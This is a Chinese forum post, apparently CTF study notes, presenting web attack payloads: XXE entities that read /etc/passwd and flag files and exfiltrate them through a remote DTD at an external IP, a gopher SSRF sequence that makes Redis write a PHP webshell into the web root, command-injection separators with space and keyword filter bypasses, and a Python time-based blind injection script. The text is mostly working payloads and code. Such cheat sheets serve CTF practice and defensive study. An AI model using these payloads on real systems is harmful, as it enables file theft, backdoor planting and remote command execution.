本帖最后由 Grav1ty 于 2021-12-29 11:48 编辑
一、 XXE XXE ( PHP 5.45之后不解析实体 ) - <!DOCTYPE 根标签名 SYSTEM "文件名">
复制代码
DTD实体是用于定义引用文本或字符的快捷方式的变量,可内部声明或外部引用。 约束通过类别关键词 ANY 声明的元素,可包含任何可解析数据的组合:
同时xxe可进行内网探测读取 /etc/hosts Payload PHP文件读取
- <?xml version="1.0" encoding="utf-8"?>
- <!DOCTYPE xxe [
- <!ELEMENT name ANY>
- <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php">]>
- <creds>
- <user>&xxe;</user>
- </creds>
复制代码
file协议读取文件
- <?xml version="1.0"?>
- <!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
- <catalog>
- <core id="test101">
- <description>&xxe;</description>
- </core>
- </catalog>
复制代码
SVG格式
- <?xml version="1.0" encoding="UTF-8"?>
- <!DOCTYPE note [
- <!ENTITY file SYSTEM "要读取的文件路径" >
- ]>
- <svg height="100" width="1000">
- <text x="10" y="20">&file;</text>
- </svg>
复制代码
数据外带
- <!DOCTYPE root [
- <!ENTITY % remote SYSTEM "http://174.1.66.167/shell.dtd">
- %remote;
- ]>
复制代码
shell.dtd
- <!ENTITY % file SYSTEM "file:///flag">
- <!ENTITY % int "<!ENTITY % send SYSTEM 'http://127.0.0.1:5555/?flag=%file;'>">
- %int;
- %send;
复制代码
xxe绕过的payload 当只过滤了SYSTEM,PUBLIC等关键字时,可用双重实体编码绕过
- <?xml version="1.0"?>
- <!DOCTYPE GVI [
- <!ENTITY % xml "<!ENTITY xxe SYSTEM "file:///flag.txt" >]><core> <message>&xxe;</message></core>">
- %xml;
复制代码
即为在xml实体中再定义一次xml,可成功被解析,支持dtd数据外带
- <!ENTITY xxe SYSTEM "file:///flag.txt" >]>
- <core>
- <message>&xxe;</message>
- </core>
复制代码
以上为编码部分内容 二、 SSRF gopher协议 在 http 出现之前,访问网页需要输入的是 而它被代替的原因一方面是收费,另一方面的原因是它固化的结构没有HTML网页灵活 利用 gopher 的方式有 FTP 爆破,REDIS,MYSQL,FAST CGI,XXE. 一些常用服务
- Redis 6379
- FPM 9000
- Smtp 25
- Mysql 3306
复制代码
常用的协议
以下为经典的 Redis 未授权访问,以及常用 payload 的生成 利用方式比如常见的,web 有一个 curl 的功能,然后可以访问内网靶机,就可以用类似的方式进行命令传递 ( payload 每经过一次传递就会被解码一次 ) redis Smtp 生成 payload Fpm 生成 payload gopher支持多行。因此要在传输的数据前加一个无用字符。比如 gopher://ip:port/_ 通常用 _ 并不是只能用 _ ,gopher协议会吃掉第一个字符 关于 redisredis 的格式:每一个 *number 代表每一行命令,number 代表每行命令中数组中的元素个数。$number 代表每个元素的长度。 URL解码后可以看到创建 shell 的完整流程
- $8 //元素长度为8
- flushall
- *3 //3个元素
- $3
- set
- $1
- 1
- $31
- <?php echo "hello world" ?>
- *4
- $6
- config
- $3
- set
- $3
- dir
- $13
- /var/www/html
- *4
- $6
- config
- $3
- set
- $10
- dbfilename
- $9
- shell.php
- *1
- $4
- save
复制代码
即为redis将输入的语句保存在指定位置的php文件中,生成后门 相关环境 BUUCTF[GKCTF_EZWEB]三、 命令执行 以下介绍为 PHP 环境 用于命令执行的函数有
- system
- exec
- passthru
- shell_exec
复制代码
一些常见的绕过方法一、命令拼接windows
- |直接执行后面的语句ping 127.0.0.1|whoami
- Ⅱ前面出错执行后面的,前面为假ping 2 ]l whoami
- &前面的语句为假则直接执行后面的,前面可真可假ping 127.0.0.1&whoami
- &&前面的语句为假则直接出错,后面的也不执行,前面只能为真ping 127.0.0.18&whoami
复制代码
Linux
- ;前面的执行完执行后面的ping 127.0.0.1;whoami
- |管道符,显示后面的执行结果ping 127.0.0.1/whoami
- 当前面的执行出错时执行后面的ping 1][whoami
- &前面的语句为假则直接执行后面的,前面可真可假ping 127.0.0.1&whoami
- &&前面的语句为假则直接出错,后面的也不执行,前面只能为真ping 127.0.0.18&whoami
复制代码
以及
二、空格绕过
- $IFS
- ${IFS}
- $IFS$1
- %09
- {cat,flag.php}
复制代码
三、关键字 flag 被过滤
例如:
- ?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
复制代码
或者使用 base64 编码绕过
- ?url=127.0.0.1|`echo%09WTJGMElDOWxkR012TG1acGJtUm1iR0ZuTDJac1lXY3VkSGgw|base64%09-d|base64%09-d`
复制代码
另外如反引号可在语句中执行命令
- ls `cat /flag > /var/www/html/1.txt`
复制代码
或者使用 $() 和八进制
- $(printf$IFS$9"\154\163")
复制代码
另附一份无回显盲注脚本
- import requests
- import time
- s=requests.session()
- flag=''
- for z in range(1,50):
- for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_!@#%|^&{}[]/-()+=,\\':
- starTime=time.time()
- url="http://127.0.0.1/?cmd=if [ `cut -c"+str(z)+"-"+str(z)+" /flag` != '"+i+"' ]; then echo 1 ; else sleep 3; fi"
- r=s.get(url)
- if((time.time()-starTime)>3):
- flag+=i
- print(flag)
- break
- print(z)
- print('the flag is'+flag)
复制代码
|